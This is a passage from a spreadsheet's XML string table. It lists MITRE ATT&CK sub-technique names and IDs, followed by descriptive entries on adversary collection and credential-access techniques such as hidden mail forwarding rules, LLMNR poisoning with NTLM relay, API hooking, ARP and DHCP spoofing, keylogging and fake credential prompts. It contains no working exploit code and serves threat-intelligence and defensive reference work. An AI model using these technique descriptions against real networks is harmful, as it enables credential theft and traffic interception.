    <t xml:space="preserve"> HTML Smuggling
T1027.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Patch System Image
T1601.001</t>
  </si>
  <si>
    <t xml:space="preserve"> LNK Icon Smuggling
T1027.012</t>
  </si>
  <si>
    <t xml:space="preserve"> Software Packing
T1027.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Indicator Removal from Tools
T1027.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Stripped Payloads
T1027.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Steganography
T1027.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Create Cloud Instance
T1578.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Email Account
T1087.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Internet Connection Discovery
T1016.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Wi-Fi Discovery
T1016.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Local Groups
T1069.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Security Software Discovery
T1518.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Domain Groups
T1069.002</t>
  </si>
  <si>
    <t xml:space="preserve"> System Language Discovery
T1614.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Cloud Account
T1087.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Domain Account
T1087.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Local Account
T1087.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Cloud Groups
T1069.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Container Orchestration Job
T1053.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Systemd Timers
T1053.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Scheduled Task
T1053.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Windows Command Shell
T1059.003</t>
  </si>
  <si>
    <t xml:space="preserve"> At
T1053.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Dynamic Data Exchange
T1559.002</t>
  </si>
  <si>
    <t xml:space="preserve"> XPC Services
T1559.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Malicious Image
T1204.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Malicious File
T1204.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Launchctl
T1569.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Component Object Model
T1559.001</t>
  </si>
  <si>
    <t xml:space="preserve"> JavaScript
T1059.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Cloud API
T1059.009</t>
  </si>
  <si>
    <t xml:space="preserve"> Network Device CLI
T1059.008</t>
  </si>
  <si>
    <t xml:space="preserve"> PowerShell
T1059.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Python
T1059.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Unix Shell
T1059.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Visual Basic
T1059.005</t>
  </si>
  <si>
    <t xml:space="preserve"> AppleScript
T1059.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Service Execution
T1569.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Malicious Link
T1204.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Cron
T1053.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Exfiltration Over Bluetooth
T1011.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Exfiltration to Text Storage Sites
T1567.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Exfiltration to Code Repository
T1567.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
T1048.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Exfiltration to Cloud Storage
T1567.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Exfiltration Over Webhook
T1567.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Traffic Duplication
T1020.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Exfiltration Over Unencrypted Non-C2 Protocol
T1048.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Exfiltration over USB
T1052.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Exfiltration Over Symmetric Encrypted Non-C2 Protocol
T1048.001</t>
  </si>
  <si>
    <t xml:space="preserve"> OS Exhaustion Flood
T1499.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Runtime Data Manipulation
T1565.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Stored Data Manipulation
T1565.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Transmitted Data Manipulation
T1565.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Direct Network Flood
T1498.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Reflection Amplification
T1498.002</t>
  </si>
  <si>
    <t xml:space="preserve"> External Defacement
T1491.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Internal Defacement
T1491.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Disk Content Wipe
T1561.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Disk Structure Wipe
T1561.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Application Exhaustion Flood
T1499.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Application or System Exploitation
T1499.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Service Exhaustion Flood
T1499.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Compromise Software Supply Chain
T1195.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Compromise Hardware Supply Chain
T1195.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Compromise Software Dependencies and Development Tools
T1195.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Spearphishing Voice
T1566.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Spearphishing Attachment
T1566.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Spearphishing Link
T1566.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Spearphishing via Service
T1566.003</t>
  </si>
  <si>
    <t xml:space="preserve"> SSH
T1021.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Cloud Services
T1021.007</t>
  </si>
  <si>
    <t xml:space="preserve"> RDP Hijacking
T1563.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Distributed Component Object Model
T1021.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Windows Remote Management
T1021.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Remote Desktop Protocol
T1021.001</t>
  </si>
  <si>
    <t xml:space="preserve"> SSH Hijacking
T1563.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Direct Cloud VM Connections
T1021.008</t>
  </si>
  <si>
    <t xml:space="preserve"> SMB/Windows Admin Shares
T1021.002</t>
  </si>
  <si>
    <t xml:space="preserve"> VNC
T1021.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Login Hook
T1037.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Trap
T1546.005</t>
  </si>
  <si>
    <t xml:space="preserve"> PowerShell Profile
T1546.013</t>
  </si>
  <si>
    <t xml:space="preserve"> Windows Service
T1543.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Netsh Helper DLL
T1546.007</t>
  </si>
  <si>
    <t xml:space="preserve"> LC_LOAD_DYLIB Addition
T1546.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Installer Packages
T1546.016</t>
  </si>
  <si>
    <t xml:space="preserve"> Additional Email Delegate Permissions
T1098.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Additional Container Cluster Roles
T1098.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Change Default File Association
T1546.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Additional Cloud Roles
T1098.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Additional Cloud Credentials
T1098.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Component Object Model Hijacking
T1546.015</t>
  </si>
  <si>
    <t xml:space="preserve"> Windows Management Instrumentation Event Subscription
T1546.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Unix Shell Configuration Modification
T1546.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Shortcut Modification
T1547.009</t>
  </si>
  <si>
    <t xml:space="preserve"> Device Registration
T1098.005</t>
  </si>
  <si>
    <t xml:space="preserve"> SSH Authorized Keys
T1098.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Network Logon Script
T1037.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Logon Script (Windows)
T1037.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Winlogon Helper DLL
T1547.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Launch Agent
T1543.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Startup Items
T1037.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Emond
T1546.014</t>
  </si>
  <si>
    <t xml:space="preserve"> XDG Autostart Entries
T1547.013</t>
  </si>
  <si>
    <t xml:space="preserve"> Time Providers
T1547.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Screensaver
T1546.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Image File Execution Options Injection
T1546.012</t>
  </si>
  <si>
    <t xml:space="preserve"> Accessibility Features
T1546.008</t>
  </si>
  <si>
    <t xml:space="preserve"> AppCert DLLs
T1546.009</t>
  </si>
  <si>
    <t xml:space="preserve"> AppInit DLLs
T1546.010</t>
  </si>
  <si>
    <t xml:space="preserve"> Application Shimming
T1546.011</t>
  </si>
  <si>
    <t xml:space="preserve"> Security Support Provider
T1547.005</t>
  </si>
  <si>
    <t xml:space="preserve"> RC Scripts
T1037.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Kernel Modules and Extensions
T1547.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Web Shell
T1505.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Office Test
T1137.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Outlook Home Page
T1137.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Office Template Macros
T1137.001</t>
  </si>
  <si>
    <t xml:space="preserve"> IIS Components
T1505.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Add-ins
T1137.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Terminal Services DLL
T1505.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Transport Agent
T1505.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Registry Run Keys / Startup Folder
T1547.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Cloud Account
T1136.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Domain Account
T1136.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Local Account
T1136.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Launch Daemon
T1543.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Active Setup
T1547.014</t>
  </si>
  <si>
    <t xml:space="preserve"> Authentication Package
T1547.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Login Items
T1547.015</t>
  </si>
  <si>
    <t xml:space="preserve"> Outlook Rules
T1137.005</t>
  </si>
  <si>
    <t xml:space="preserve"> LSASS Driver
T1547.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Port Monitors
T1547.010</t>
  </si>
  <si>
    <t xml:space="preserve"> Systemd Service
T1543.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Print Processors
T1547.012</t>
  </si>
  <si>
    <t xml:space="preserve"> Re-opened Applications
T1547.007</t>
  </si>
  <si>
    <t xml:space="preserve"> SQL Stored Procedures
T1505.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Outlook Forms
T1137.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Social Media
T1593.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Search Engines
T1593.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Code Repositories
T1593.003</t>
  </si>
  <si>
    <t xml:space="preserve"> WHOIS
T1596.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Scan Databases
T1596.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Digital Certificates
T1596.003</t>
  </si>
  <si>
    <t xml:space="preserve"> CDNs
T1596.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Wordlist Scanning
T1595.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Threat Intel Vendors
T1597.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Purchase Technical Data
T1597.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Firmware
T1592.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Vulnerability Scanning
T1595.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Credentials
T1589.001</t>
  </si>
  <si>
    <t xml:space="preserve"> DNS/Passive DNS
T1596.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Client Configurations
T1592.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Network Trust Dependencies
T1590.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Spearphishing Service
T1598.001</t>
  </si>
  <si>
    <t xml:space="preserve"> DNS
T1590.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Domain Properties
T1590.001</t>
  </si>
  <si>
    <t xml:space="preserve"> IP Addresses
T1590.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Network Security Appliances
T1590.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Network Topology
T1590.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Spearphishing Link
T1598.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Determine Physical Locations
T1591.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Identify Business Tempo
T1591.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Identify Roles
T1591.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Spearphishing Attachment
T1598.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Software
T1592.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Email Addresses
T1589.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Employee Names
T1589.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Scanning IP Blocks
T1595.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Spearphishing Voice
T1598.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Business Relationships
T1591.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Hardware
T1592.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Tool
T1588.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Digital Certificates
T1588.004</t>
  </si>
  <si>
    <t xml:space="preserve"> DNS Server
T1583.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Botnet
T1583.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Social Media Accounts
T1586.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Botnet
T1584.005</t>
  </si>
  <si>
    <t xml:space="preserve"> DNS Server
T1584.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Domains
T1584.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Drive-by Target
T1608.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Domains
T1583.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Serverless
T1584.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Social Media Accounts
T1585.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Email Accounts
T1585.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Cloud Accounts
T1585.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Cloud Accounts
T1586.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Server
T1584.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Virtual Private Server
T1584.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Code Signing Certificates
T1587.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Link Target
T1608.005</t>
  </si>
  <si>
    <t xml:space="preserve"> SEO Poisoning
T1608.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Exploits
T1588.005</t>
  </si>
  <si>
    <t xml:space="preserve"> Malware
T1588.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Vulnerabilities
T1588.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Code Signing Certificates
T1588.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Install Digital Certificate
T1608.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Email Accounts
T1586.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Server
T1583.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Serverless
T1583.007</t>
  </si>
  <si>
    <t xml:space="preserve"> Virtual Private Server
T1583.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Web Services
T1583.006</t>
  </si>
  <si>
    <t xml:space="preserve"> Malware
T1587.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Exploits
T1587.004</t>
  </si>
  <si>
    <t xml:space="preserve"> Malvertising
T1583.008</t>
  </si>
  <si>
    <t xml:space="preserve"> Digital Certificates
T1587.003</t>
  </si>
  <si>
    <t xml:space="preserve"> Upload Tool
T1608.002</t>
  </si>
  <si>
    <t xml:space="preserve"> Upload Malware
T1608.001</t>
  </si>
  <si>
    <t xml:space="preserve"> Web Services
T1584.006</t>
  </si>
  <si>
    <t>Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.</t>
  </si>
  <si>
    <t>Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\&lt;username&gt;\Documents\Outlook Files` or `C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)
Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)
In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives. </t>
  </si>
  <si>
    <t>By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. 
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In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. 
Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows: 
1. The client broadcasts a `DISCOVER` message.
2. The server responds with an `OFFER` message, which includes an available network address. 
3. The client broadcasts a `REQUEST` message, which includes the network address offered. 
4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.
Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.
DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a &lt;code&gt;INFORMATION-REQUEST (code 11)&lt;/code&gt; message to the &lt;code&gt;All_DHCP_Relay_Agents_and_Servers&lt;/code&gt; multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.
Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool. </t>
  </si>
  <si>
    <t>Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t>Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.
Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. </t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
